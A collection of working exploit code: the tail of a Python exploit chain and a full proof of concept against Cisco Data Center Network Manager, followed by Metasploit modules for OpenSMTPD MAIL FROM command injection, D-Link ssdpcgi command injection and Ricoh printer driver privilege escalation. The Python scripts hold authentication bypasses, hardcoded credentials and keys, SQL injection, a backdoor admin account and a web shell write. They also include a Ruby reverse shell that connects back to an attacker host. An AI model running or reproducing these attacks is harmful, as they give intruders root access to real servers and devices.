    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
    soap_body += craft_soap_header()
    soap_body += '\t<soapenv:Body>'
    soap_body += '\t\t<ep:openReportTemplate>'
    soap_body += '\t\t\t<reportTemplateName>%s</reportTemplateName>' % shellpath
    soap_body += '\t\t\t<userName>1337</userName>'
    soap_body += '\t\t</ep:openReportTemplate>'
    soap_body += '\t</soapenv:Body>'
    soap_body += '</soapenv:Envelope>'
    uri = "https://%s/ReportWSService/ReportWS" % target
    r = requests.post(uri, data=soap_body, verify=False)
    if r.status_code == 200:
        return True
    return False

def gen_ssotoken():
""" auth bypass """
    timestamp = 9999999999999  # we live forever
    username = "hax"           # doesnt even need to exist!
    sessionid = 1337           # doesnt even need to exist!
    d = "%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" % (username, sessionid, timestamp)
    return "%d.%d.%s.%s" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)

def we_can_trigger_sql_injection(target, sql):
""" stacked sqli primitive """
    sqli = ";%s--" % sql
    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
    soap_body += craft_soap_header()
    soap_body += '\t<soapenv:Body>'
    soap_body += '\t\t<ep:getVmHostData>'
    soap_body += '\t\t\t<arg0>'
    soap_body += '\t\t\t\t<sortField>vcluster</sortField>'
    soap_body += '\t\t\t\t<sortType>%s</sortType>' % sqli
    soap_body += '\t\t\t</arg0>'
    soap_body += '\t\t\t<arg1></arg1>'
    soap_body += '\t\t\t<arg2></arg2>'
    soap_body += '\t\t\t<arg3>false</arg3>'
    soap_body += '\t\t</ep:getVmHostData>'
    soap_body += '\t</soapenv:Body>'
    soap_body += '</soapenv:Envelope>'
    uri = "https://%s/DbInventoryWSService/DbInventoryWS" % target
    r = requests.post(uri, data=soap_body, verify=False)
    if r.status_code == 200:
        return True
    return False

def we_can_leak_vfs(target):
""" we use a information disclosure for the vfs path """
    global vfs
    uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
    c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')
    r = requests.get(uri, verify=False, auth=c)
    match = re.search(r"temp\\(.{21}content-.{15,16})", r.text)
    if match:
        vfs = str(match.group(1).replace("\\","/"))
        return True
    return False

def handler(lp):
""" this is the client handler, to catch the connectback """
    print "(+) starting handler on port %d" % lp
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print  "(+) connection from %s" % addr[0]
    t.sock = conn
    print "(+) pop thy shell!"
    t.interact()

def exec_code(t, usr, pwd, cbp):
""" this function threads the client handler and sends off the attacking payload """
    handlerthr = Thread(target=handler, args=(int(cbp),))
    handlerthr.start()
    r = requests.get("https://%s/si.jsp" % t, cookies=get_session(t, usr, pwd), verify=False)

def we_can_add_user(target, usr, pwd):
""" add a user so that we can reach our backdoor! """
    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
    soap_body += craft_soap_header()
    soap_body += '\t<soapenv:Body>'
    soap_body += '\t\t<ep:addUser>'
    soap_body += '\t\t\t<userName>%s</userName>' % usr
    soap_body += '\t\t\t<password>%s</password>' % pwd
    soap_body += '\t\t\t<roleName>global-admin</roleName>'
    soap_body += '\t\t\t<enablePwdExpiration>false</enablePwdExpiration>'
    soap_body += '\t\t</ep:addUser>'
    soap_body += '\t</soapenv:Body>'
    soap_body += '</soapenv:Envelope>'
    uri = "https://%s/DbAdminWSService/DbAdminWS" % target
    r = requests.post(uri, data=soap_body, verify=False)
    tree = ElementTree.fromstring(r.content)
    for elem in tree.iter():
        if elem.tag == "resultMessage":
            res = elem.text
    if res == "Success":
        return True
    elif res == "User already exists.":
        return True
    return False

def main():

    usr = "hacker"
    pwd = "Hacked123"

    if len(sys.argv) != 3:
        print "(+) usage: %s <target> <connectback>" % sys.argv[0]
        print "(+) eg: %s 192.168.100.122 192.168.100.59:1337" % sys.argv[0]
        sys.exit(1)

    t = sys.argv[1]
    c = sys.argv[2]

    cbh = c.split(":")[0]
    cbp = c.split(":")[1]
    sc = _get_jsp(cbh, cbp).encode("hex")

    # stage 1 - add a user
    if we_can_add_user(t, usr, pwd):
        print "(+) created the account %s:%s" % (usr, pwd)

        # stage 2 - trigger folder creation and db entry
        if we_can_trigger_folder_path_creation(t):
            print "(+) created the 1337/custom path!"

            # stage 3 - leak the vfs path (not really required I suppose)
            if we_can_leak_vfs(t):
                print "(+) leaked vfs! %s" % vfs

                # stage 4 - trigger the sql injection to update our template entry
                sp = "../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp" % vfs
                sql = "update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';" % (sp, sc)
                if we_can_trigger_sql_injection(t, sql):
                    print "(+) SQL Injection working!"

                    # stage 5 - trigger the shell write
                    if we_can_trigger_second_order_write(t, sp):
                        print "(+) wrote the si.jsp shell!"

                        # stage 6 - cleanup
                        sql = "delete from xmldocs where user_name='1337';"
                        if we_can_trigger_sql_injection(t, sql):
                            print "(+) cleaned up the database!"

                        # stage 7 - go get some rce
                        exec_code(t, usr, pwd, cbp)

if __name__ == "__main__":
    main()

#!/usr/bin/python
"""
Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability

Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers
- Release: 11.2(1)
- Release Date: 05-Jun-2019
- FileName: dcnm-va.11.2.1.iso.zip
- Size: 4473.54 MB (4690850167 bytes)
- MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb 

Bug 1: CVE-2019-15977 / ZDI-20-012
Bug 2: CVE-2019-15977 / ZDI-20-013
Bug 3: CVE-2019-15978 / ZDI-20-102

Example:
========

saturn:~ mr_me$ ./poc.py 
(+) usage: ./poc.py <target> <connectback:port>
(+) eg: ./poc.py 192.168.100.123 192.168.100.59
(+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337

saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.59:1337
(+) leaked user: root
(+) leaked pass: Dcnmpass123
(+) leaked vfs path: temp18206a94b7c45072/content-85ba056e1faec012
(+) created a root session!
(+) starting handler on port 1337
(+) connection from 192.168.100.123
(+) pop thy shell!
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux localhost 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
"""

import re
import sys
import random
import socket
import string
import requests
import telnetlib
from threading import Thread
from Crypto.Cipher import Blowfish
from requests.auth import HTTPBasicAuth
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def handler(lp):
    print "(+) starting handler on port %d" % lp
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print  "(+) connection from %s" % addr[0]
    t.sock = conn
    print "(+) pop thy shell!"
    t.interact()

def exec_code(t, lp, s):
    handlerthr = Thread(target=handler, args=(lp,))
    handlerthr.start()
    c = { "JSESSIONID" : sessionid }
    r = requests.get("https://%s/%s" % (t, s), cookies=c, verify=False)

def random_string(string_length = 8):
""" generate a random string of fixed length """
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(string_length))

def decrypt(key):
""" decrypt the leaked password """
    cipher = Blowfish.new("jaas is the way", Blowfish.MODE_ECB)
    msg = cipher.decrypt(key.decode("hex"))
    return msg

def we_can_leak(target):
""" used to bypass auth """
    global dbuser, dbpass, vfspth, jdbc, rootuser, rootpass
    dbuser = None
    dbpass = None 
    vfspth = None
    rootuser = None
    rootpass = None
    jdbc = None
    uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
    c = HTTPBasicAuth('admin', 'nbv_12345')
    r = requests.get(uri, verify=False, auth=c)
    leaked = r.text
    match = re.search("db.password = #(.*)", leaked)
    if match:
        dbpass = match.group(1)
    match = re.search("db.user = (.*)", leaked)
    if match:
        dbuser = match.group(1)
    match = re.search("dcnmweb = (.*)", leaked)
    if match:
        vfspth = match.group(1)
    match = re.search("db.url = (.*)", leaked)
    if match:
        jdbc = match.group(1)
    match = re.search("server.sftp.password = #(.*)", leaked)
    if match:
        rootpass = match.group(1)
    match = re.search("server.sftp.username = (.*)", leaked)
    if match:
        rootuser = match.group(1)
    if dbuser and dbpass and vfspth and jdbc and rootuser and rootpass:
        return True
    return False

def we_can_login(target, password):
""" we have bypassed auth at this point by leaking the creds """
    global sessionid, resttoken
    d = {
"j_username" : rootuser,
"j_password" : password,
    }
    uri = "https://%s/j_spring_security_check" % target
    r = requests.post(uri, data=d, verify=False, allow_redirects=False)
    if "Set-Cookie" in r.headers:
        match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,3}:.{44});", r.headers["Set-Cookie"])
        if match:
            sessionid = match.group(1)
            resttoken = match.group(2)
            return True
    return False

def pop_a_root_shell(t, ls, lp):
""" get dat shell! """
    handlerthr = Thread(target=handler, args=(lp,))
    handlerthr.start()
    uri = "https://%s/rest/fabrics" % t
    cmdi  = "%s\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"%s\",\"%d\");" % (random_string(), ls, lp)
    cmdi += "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\""
    j = { 
"name" : cmdi,

        # this is needed to pass validate() on line 149 of the LanFabricImpl class
"generalSetting" : {
"asn" : "1337",
"provisionOption" : "Manual"
        }, 
"provisionSetting" : {
"dhcpSetting": {
"primarySubnet" : "127.0.0.1",
"primaryDNS" : "127.0.0.1",
"secondaryDNS" : "127.0.0.1"
            },
"ldapSetting" : {
"server" : "127.0.0.1"
            },
"amqpSetting" : {
"server" : "127.0.0.1:1337"
            }
        }
    }
    c = { "resttoken": resttoken }
    r = requests.post(uri, json=j, cookies=c, verify=False)
    if r.status_code == 200 and ls in r.text:
        return True
    return False

def main():
    if len(sys.argv) != 3:
        print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
        print "(+) eg: %s 192.168.100.123 192.168.100.59" % sys.argv[0]
        print "(+) eg: %s 192.168.100.123 192.168.100.59:1337" % sys.argv[0]
        sys.exit(1)
    t = sys.argv[1]
    cb = sys.argv[2]
    if not ":" in cb:
        print "(+) using default connectback port 4444"
        ls = cb
        lp = 4444
    else:
        if not cb.split(":")[1].isdigit():
            print "(-) %s is not a port number!" % cb.split(":")[1]
            sys.exit(-1)
        ls = cb.split(":")[0]
        lp = int(cb.split(":")[1])

    # stage 1 - leak the creds
    if we_can_leak(t):
        pwd = re.sub(r'[^\x20-\x7F]+','', decrypt(rootpass))
        print "(+) leaked user: %s" % rootuser
        print "(+) leaked pass: %s" % pwd
        print "(+) leaked vfs path: %s" % "/".join(vfspth.split("/")[10:])

        # stage 2 - get a valid sesson
        if we_can_login(t, pwd):
            print "(+) created a root session!"

            # stage 3 - get a root shell via cmdi
            pop_a_root_shell(t, ls, lp)

if __name__ == "__main__":
    main()

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Expect

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'OpenSMTPD MAIL FROM Remote Code Execution',
'Description'    => %q{
        This module exploits a command injection in the MAIL FROM field during
        SMTP interaction with OpenSMTPD to execute code as the root user.
      },
'Author'         => [
'Qualys',                               # Discovery and PoC
'wvu',                                  # Module
'RageLtMan <rageltman[at]sempervictus>' # Module
      ],
'References'     => [
        ['CVE', '2020-7247'],
        ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']
      ],
'DisclosureDate' => '2020-01-28',
'License'        => MSF_LICENSE,
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'Privileged'     => true,
'Targets'        => [
        ['OpenSMTPD >= commit a8e222352f',
'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
        ]
      ],
'DefaultTarget'  => 0,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
    ))

    register_options([
      Opt::RPORT(25),
      OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit',   [false, 'Override check result', false]),
      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
    ])
  end

  def check
    connect
    res = sock.get_once

    return CheckCode::Unknown unless res
    return CheckCode::Detected if res =~ /^220.*OpenSMTPD/

    CheckCode::Safe
  rescue EOFError, Rex::ConnectionError => e
    vprint_error(e.message)
    CheckCode::Unknown
  ensure
    disconnect
  end

  def exploit
    unless datastore['ForceExploit']
      unless check == CheckCode::Detected
        fail_with(Failure::Unknown, 'Set ForceExploit to override')
      end
    end

    # We don't care who we are, so randomize it
    me = rand_text_alphanumeric(8..42)

    # Send mail to this valid recipient
    to = datastore['RCPT_TO']

    # Comment "slide" courtesy of Qualys - brilliant!
    iter = rand_text_alphanumeric(15).chars.join('')
    from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"

    # This is just insurance, since the code was already written
    if from.length > 64
      fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
    elsif (badchars = (from.chars & target['MyBadChars'])).any?
      fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
    end

    # Create the mail body with comment slide and payload
    body = "\r\n" + "#\r\n" * 15 + payload.encoded

    sploit = {
      nil                   => /220.*OpenSMTPD/,
"HELO #{me}"          => /250.*pleased to meet you/,
"MAIL FROM:<#{from}>" => /250.*Ok/,
"RCPT TO:<#{to}>"     => /250.*Recipient ok/,
'DATA'                => /354 Enter mail.*itself/,
      body                  => nil,
'.'                   => /250.*Message accepted for delivery/,
'QUIT'                => /221.*Bye/
    }

    print_status('Connecting to OpenSMTPD')
    connect

    print_status('Saying hello and sending exploit')
    sploit.each do |line, pattern|
      send_expect(
        line,
        pattern,
        sock:    sock,
        timeout: datastore['ExpectTimeout'],
        newline: "\r\n"
      )
    end
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue Timeout::Error => e
    fail_with(Failure::TimeoutExpired, e.message)
  ensure
    disconnect
  end

end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
'Description' => %q{
        D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
      },
'Author'      =>
        [
's1kr10s',
'secenv'
        ],
'License'     => MSF_LICENSE,
'References'  =>
        [
          ['CVE', '2019-20215'],
          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
        ],
'DisclosureDate' => 'Dec 24 2019',
'Privileged'     => true,
'Platform'       => 'linux',
'Arch'        => ARCH_MIPSBE,
'DefaultOptions' =>
        {
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '1900'
        },
'Targets'        =>
        [
          [ 'Auto',  { } ],
        ],
'CmdStagerFlavor' => %w{ echo wget },
'DefaultTarget'  => 0
      ))

  register_options(
    [
      Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
    ])
  end

  def exploit
    execute_cmdstager(linemax: 1500)
  end

  def execute_command(cmd, opts)
    type = datastore['VECTOR']
    if type == "URN"
      print_status("Target Payload URN")
      val = "urn:device:1;`#{cmd}`"
    else
      print_status("Target Payload UUID")
      val = "uuid:`#{cmd}`"
    end

    connect_udp
    header = "M-SEARCH * HTTP/1.1\r\n"
    header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
    header << "ST:#{val}\r\n"
    header << "Man:\"ssdp:discover\"\r\n"
    header << "MX:2\r\n\r\n"
    udp_sock.put(header)
    disconnect_udp
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Ricoh Driver Privilege Escalation',
'Description'    => %q(
        Various Ricoh printer drivers allow escalation of
        privileges on Windows systems.

        For vulnerable drivers, a low-privileged user can
        read/write files within the `RICOH_DRV` directory
        and its subdirectories.

        `PrintIsolationHost.exe`, a Windows process running
        as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
        during the installation of a printer. A user can
        elevate to SYSTEM by writing a malicious DLL to
        the vulnerable driver directory and adding a new
        printer with a vulnerable driver.

        This module leverages the `prnmngr.vbs` script
        to add and delete printers. Multiple runs of this
        module may be required given successful exploitation
        is time-sensitive.
      ),
'License'        => MSF_LICENSE,
'Author'         => [
'Alexander Pudwill',  # discovery & PoC
'Pentagrid AG',       # PoC
'Shelby Pace'         # msf module
                          ],
'References'     =>
        [
          [ 'CVE', '2019-19363'],
          [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
        ],
'Arch'           => [ ARCH_X86, ARCH_X64 ],
'Platform'       => 'win',
'Payload'        =>
      {
      },
'SessionTypes'   => [ 'meterpreter' ],
'Targets'        =>
        [[
'Windows', { 'Arch'  => [ ARCH_X86, ARCH_X64 ] }
        ]],
'Notes'          =>
      {
'SideEffects' =>  [ ARTIFACTS_ON_DISK ],
'Reliability' =>  [ UNRELIABLE_SESSION ],
'Stability'   =>  [ SERVICE_RESOURCE_LOSS ]
      },
'DisclosureDate' => "Jan 22 2020",
'DefaultTarget'  => 0
    ))

    self.needs_cleanup = true

    register_advanced_options([
      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
    ])
  end

  def check
    dir_name = "C:\\ProgramData\\RICOH_DRV"

    return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
    driver_names = dir(dir_name)

    return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length

    vulnerable = false
    driver_names.each do |driver_name|
      full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
      next unless directory?(full_path)
      @driver_path = full_path

      res = cmd_exec("icacls \"#{@driver_path}\"")
      next unless res.include?('Everyone:')
      next unless res.match(/\(F\)/)

      vulnerable = true
      break
    end

    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable

    vprint_status("Vulnerable driver directory: #{@driver_path}")
    CheckCode::Appears('Ricoh driver directory has full permissions')
  end

  def add_printer(driver_name)
    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)

    dll_data = generate_payload_dll
    dll_path = "#{@driver_path}\\headerfooter.dll"

    temp_path = expand_path('%TEMP%\\headerfooter.dll')
    vprint_status("Writing dll to #{temp_path}")

    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
    bat_file = <<~HEREDOC
      :repeat
      #{cp_cmd} && goto :repeat
    HEREDOC

    write_file(bat_file_path, bat_file)
    write_file(temp_path, dll_data)
    register_files_for_cleanup(bat_file_path, temp_path)

    script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
    bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
    print_status("Adding printer #{@printer_name}...")
    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
    vprint_status("Executing script...")
    cmd_exec(bat_cmd)
  rescue Rex::Post::Meterpreter::RequestError => e
    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
  end

  def exploit
    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?

    fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'

    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
    end

    @driver_path = ''
    unless check == CheckCode::Appears || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
    end

    @printer_name = Rex::Text.rand_text_alpha(5..9)
    @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
    drvr_name = @driver_path.split('\\')
    drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
    drvr_name = drvr_name[drvr_name_idx]

    add_printer(drvr_name)
  end

  def cleanup
    print_status("Deleting printer #{@printer_name}")
    Rex.sleep(3)
    delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
    client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
  end
end